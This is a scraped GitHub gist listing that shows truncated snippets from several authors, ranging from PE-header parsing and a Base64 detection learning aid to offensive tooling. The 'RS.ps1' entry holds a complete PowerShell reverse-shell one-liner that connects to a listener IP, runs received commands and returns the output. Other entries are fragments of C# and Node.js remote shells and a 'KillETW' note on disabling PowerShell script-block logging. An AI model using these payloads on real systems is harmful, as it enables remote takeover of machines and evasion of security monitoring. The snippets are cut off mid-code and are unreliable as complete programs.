Hannn GetRektBoy724
  • Indonesia
k4nfr3 / ioc_vulnerable_drivers.csv
Last active March 28, 2024 07:43
IOC vulnerable drivers
MircoBabin / ReadingPortableExecutable_PE_header.cs
Last active June 3, 2021 13:02 — forked from augustoproiete/ReadingPortableExecutable_PE_header.cs
Reading the Portable Executable (PE) header in C# - reading Import Directory Table to e.g. determine Microsoft VC Runtime version
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
namespace peheader
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
class Program
static void Main(string[] args)
Neo23x0 /
Last active August 26, 2024 21:26
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
| JAB | 🗣 Jabber | $. | Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
| TVq | 📺 Television | MZ | MZ header |
| SUVY | 🚙 SUV | IEX | PowerShell Invoke Expression |
| SQBFAF | 🐣 Squab favorite | I.E. | PowerShell Invoke Expression (UTF-16) |
| SQBuAH | 🐣 Squab uahhh | I.n. | PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
| PAA | 💪 "Pah!" | <. | Often used by Emotet (UTF-16) |
nathan130200 / MessageBox.cs
Created July 14, 2019 18:39
C# user32.dll MessageBox Raw implementation without System.Windows.Forms (based on
namespace User32
public static class MessageBox
static extern int MessageBoxA(IntPtr hWnd,
string lpText,
string lpCaption,
uint uType);
BankSecurity / Simple_Rev_Shell.cs
Last active September 9, 2024 14:46
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namazso / pdb_parser_lite.cpp
Created April 18, 2018 17:49
A lightweight PDB parser that retrieves type and symbol CodeView streams.
/* MIT License
* Copyright (c) namazso 2018
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
ohpe / RS.ps1
Last active August 25, 2021 01:57
PowerShell Reverse Shell
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
tandasat / KillETW.ps1
Last active March 15, 2024 05:20
Disable ETW of the current PowerShell session
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
roccomuso / Client.js
Last active February 19, 2023 21:19
Node.js remote shell example
var net = require('net')
var readline = require('readline')
* @class Client
* @param host {String} the host
* @param post {Integer} the port
function Client (host, port) { = host